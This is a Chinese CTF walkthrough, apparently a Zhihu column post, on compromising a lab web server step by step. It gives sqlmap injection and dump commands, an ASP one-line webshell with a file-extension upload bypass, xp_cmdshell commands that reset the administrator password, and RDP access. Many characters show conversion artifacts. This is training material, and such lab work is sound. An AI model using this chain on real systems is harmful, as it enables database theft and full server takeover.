0x00 介紹
接著上一篇《CTF之主機滲透系列二》,咱們繼續(xù)。還是那句話,任何工具使用均來自互聯(lián)網(wǎng),涉及到的技術(shù)僅用于教學(xué),不得用于非法用途,請遵守國家安全法律法規(guī),做一個正能量的安全人員。
試題如下:
第一步:我們訪問鏈接:http://202.0.0.23/
進入網(wǎng)頁首頁,通過瀏覽觀察,找到http://202.0.0.23/NewsList.asp?SortID=17 新聞資訊頁面,通過get方法提交的參數(shù)名為SortID,值為1,我們嘗試一下是否存在sql注入,通過sqlmap去跑一下
發(fā)現(xiàn)存在sql注入漏洞sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs
sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables
sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump
查看賬號密碼的數(shù)據(jù)庫表
對b2076528346216b3進行md5解密,解密得密碼為admin1234賬號為root
第二步:接下來使用御劍后臺掃描,找到后臺登錄頁面
右鍵此頁面查看源碼,找到一個flag:<!--flag2{890b0c4958ef57e9264a9d2703ea7e8c}-->
第三步:使用賬戶root密碼admin1234登錄后臺,在后臺系統(tǒng)信息-文件上傳處上傳后綴為.asp的asp一句話木馬,一句話木馬內(nèi)容:<%eval request("caidao")%> (按照asp一句話木馬格式)
結(jié)果提示上傳文件格式不對,想下繞過辦法
這里我們將一句話木馬文件改一個可執(zhí)行的后綴.cer
則上傳成功第四步:下面我們直接上菜刀工具了
在網(wǎng)站根目錄發(fā)現(xiàn)flag文件flag3{23c5b149510105853f5e7ef9a6f06627}
在數(shù)據(jù)庫配置文件中找到數(shù)據(jù)庫的賬號密碼
使用一句話木馬連接mssql數(shù)據(jù)庫
利用mssql數(shù)據(jù)庫的xpcmdshell組件執(zhí)行系統(tǒng)命令 EXEC master..xp_cmdshell 'whoami'
當前cmdshell的權(quán)限是system權(quán)限,所以直接修改administrator的密碼為hacker:EXEC master..xp_cmdshell 'net user administrator 123456'
第五步:直接遠程桌面連接服務(wù)器administrator/123456,在桌面發(fā)現(xiàn)flag文件,flag5{47baf6d9d60f40c8b1dafa56c62fcd06}
在c盤發(fā)現(xiàn)另外一個flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}
至此,5個flag就找出來了,未完待續(xù)!!!
更多信安干貨文章,請持續(xù)關(guān)注專欄
知了堂禁衛(wèi)實驗室?zhuanlan.zhihu.com
